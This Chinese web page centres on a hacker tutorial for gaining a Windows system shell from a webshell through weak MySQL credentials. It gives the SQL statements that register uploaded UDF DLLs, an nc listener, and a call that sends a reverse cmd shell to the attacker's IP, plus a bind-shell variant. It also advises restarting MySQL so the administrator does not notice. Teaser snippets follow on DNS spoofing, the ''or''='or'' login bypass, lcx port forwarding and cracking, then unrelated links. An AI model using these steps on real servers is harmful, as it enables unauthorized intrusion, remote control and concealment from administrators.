利用mysql弱口令拿到系统权限的前提条件是什么?怎么提权?
S-serv提权方式人人都会用了,搞得现在的主机都配置得非常安全,看来攻击手法的层出不穷也是造成中国网络安全进步的一大原因之一,还有其他的pcanywhere获取密码,替换服务,等等。但是现在也没这么好搞了,随着安全意识的提高,之前的方式估计不怎么管用,现在我给大家介绍一下一种新的提权方式,看过古典LM做的那动画的朋友都知道吧?利用MYSQLl弱口令拿到系统权限,在WEBSHEL上也可实现,不过有个前提,就是目标主机装有MYSQL,而你又知道MYSQL的用户和密码,才可以进行提权。WEBSHELL获得了,找用户和密码也不是什么难事。现在我拿我另外一台机器做示范,已经把PHPSHELL传上去了,如图1
一般来说连接MYSQL的帐户密码很好找,随便编辑一个PHP文件,就看到了。如图2
看到了吧,用户名:root 密码:123456 库名:php 然后怎么办呢?先用SQL Query 建立连接,如图3
哈连接成功了,现在开始将我们的提权用滴东东:Mix.dll My_udf.dll上传上去先.OK,传好了,Mix.dll用于反弹连接,My_udf.dll是正向连接,直接用连接对方的3306端口然后输入密码就可获得CMDSHELL。好,不多说了,传上去之后呢就执行以下SQL语句create function Mixconnect returns string soname 'd:\\php\\php\\Mix.dll'; 来注册函数.
出现SQL语句成功执行!如图4
离拿到CMDSHELL已经不远了,我们先用NC在本地监听一个端口先,Nc -l -p 1234 (这个我想不用截图了吧)而后执行语句:select Mixconnect('192.168.1.254','1234'); 来激活那个函数,如图5
执行成功,然后看看我们的NC有反映没,如图6
成功得到CMSHELL,不过这时对方的MYSQL已经假死咯,我们要把MYSQL服务进程给kill掉,然后重新启动MYSQL服务才行,不然管理员发现网站运行不了了,那就。。。。如果该服务器不允许连接任何外部IP和端口,而他的3306端口却是对外开的!这时My_udf.dll就该上场了,使用方法和Mix一样,连接MYSQL成功后执行如下语句:create function my_udfdoor returns string soname 'D:\\php\\php\my_udf.dll'; 执行语句成功后,然后我们就开始激活这个函数,输入语句:select my_udfdoor (''); 然后用nc连接3306端口,然后输入f**k 就可以得到一个cmdshell了如图7
OK成功!测试结束咯
dns欺骗是什么?dns欺骗有什么条件和限制?
定义: DNS欺骗就是攻击者冒充域名服务器的一种欺骗行为。原理:如果可以冒充域名服务器,然后把查询的IP地址设为攻击者的IP地址,这样的话,用户上网就只能看到攻击者的主页,而不是用户想要取得的网站的主页了,这就是DNS欺骗的基本原理。DNS欺骗其实并不是真的“
详情2018-01-02 16:11:39责编:llp 来源:驱动管家手机木马可以盗取网银是因为验证码短信?
360手机安全中心接到大量用户举报,称其遭受短信诈骗,被骗金额多数以万计。最终都是因为用户中招后,验证码被木马偷偷转发到不法分子手机中。
详情2018-01-17 17:08:08责编:llp 来源:驱动管家出现万能密码能进入后台的漏洞怎么修复?
万能密码漏洞以及修复记得几年前要入侵一个企业网站超级简单一般只需要找到后台 还有后台通常是www xxx com admin 然后账号 密码都是& 39;or& 39;=& 39;or& 39; 就进去现在好像有几个也可以用 但是已经没那么
详情2018-01-26 12:13:03责编:llp 来源:驱动管家黑客攻击oracle系统有哪些方法?可以使用入侵检测工具检测oracle系统
Oracle的销售在向客户兜售其数据库系统一直把它吹捧为牢不可破的,耍嘴皮子容易,兑现起来可就不那么容易了。不管什么计算机系统,人们总能够找到攻击它的方法,Oracle也不例外。本文将和大家从黑客的角度讨论黑
详情2018-02-04 09:35:04责编:llp 来源:驱动管家为什么有lcx工具?lcx工具的使用方法是什么?
1 首先我们要知道为什么有lcx这个工具?存在即合理,它的出现肯定是为了达到什么目的,达到什么目的呢?看看下图,上面明确说明了使用方法:第一条指令:lcx exe –listen本机连接端口转发到端口;第二条很
详情2018-02-10 09:34:19责编:llp 来源:驱动管家网站安全扫描工具:zmap怎么进行全网检测?
ZMap是一个开源网络扫描工具,可以帮助研究人员快速的进行全网检测。只需要一台机器和足够上行网络速度,就可以以达到千兆以太网的理论值速度并在45分钟内扫描全网络IPv4地址。基本选项这些选项是在扫描中最常用
详情2018-01-21 09:02:32责编:llp 来源:驱动管家什么是爆破?怎么修改跳转指令?
从本章开始,我们来一步一步学习Crack软件(80%读者昏死过去,且不省人世 另有20%在寻找附近可以用来打人的东西)不可不说一下学习破解的三个阶段:初级,修改程序,用ultraedit等工具修改exe文件,称暴力破解,简
详情2018-02-05 17:57:33责编:llp 来源:驱动管家入侵检测系统suricata ids怎么在linux服务器上安装?
本篇文章将演示如何在Linux服务器上安装和配置Suricata IDS。在Linux上安装Suricata IDS不妨用源代码构建Suricata。你先要安装几个所需的依赖项,如下所示。在Debian、Ubuntu或Linux Mint上安装依赖项$ sudo
详情2018-01-25 17:08:31责编:llp 来源:驱动管家密码学的几个词汇 php中提供了哪些数据加密功能?
综述:密码学是研究编制密码(我们简称为加密:encode)和破译密码(我们称之为解密:decode)的技术科学。研究密码变化的客观规律,应用于编制密码以保守通信秘密的,称为编码学;应用于破译密码以获取通信情报
详情2018-02-07 13:27:46责编:llp 来源:驱动管家filezilla怎么用?filezilla server的安装和配置
Filezilla的主要优势在于:高安全、高性能。Filazilla的安全性是来自于其开放源代码的。开源为何能保证安全?每一款软件产品诞生后,都有很多人试图发现其漏洞进行攻击,以获取权限和其他利益。如果是开源软件,
详情2018-01-26 10:57:51责编:llp 来源:驱动管家
- 怎么创建恢复驱动器?win10创建恢复驱动器失败了怎么办
- 自动扫描驱动器能不能关闭?win8系统怎么关闭
- qq家园怎么关闭?qq家园关闭的方法有哪些?
- 电子音乐相册可以做旁白吗?怎么用数码大师给相册做旁白?
- 如何选购摄像机?选购摄像机的方法
- 两款佳能摄像机型号参数以及特点介绍
- 诺基亚7 Plus或售3150元 配置一般但终于用上全面屏
- windows系统电脑使用curl命令就是这样简单?curl命令使用方法
- word文档的对话框打开时命令无法执行的问题该怎么解决
- vivo y27有哪些优势?vivo y27值得买吗?
- 超值版三星s4多少钱?多少钱可以买到三星s4超值版?
- 屏幕刷新率在哪儿设置?设置屏幕刷新率的方法是什么?
- 如何实现内核钩子?内核函数系列简单介绍
- 有道云笔记为什么会授权失败?有道云笔记授权失败了该怎么办?
- 指纹二维码图片是怎么做出来的?指纹二维码图片制作方法
- 适马镜头好不好?适马镜头的详细介绍
- 闪存摄像机和硬盘摄像机之间的区别有哪些
- 苹果怎么设置铃声?教你用pp助手设置苹果手机铃声
- 如何设置局域网?苹果电脑设置局域网的方法
- vivo x6s plus安兔兔跑分评测 vivo x6s plus的跑分成绩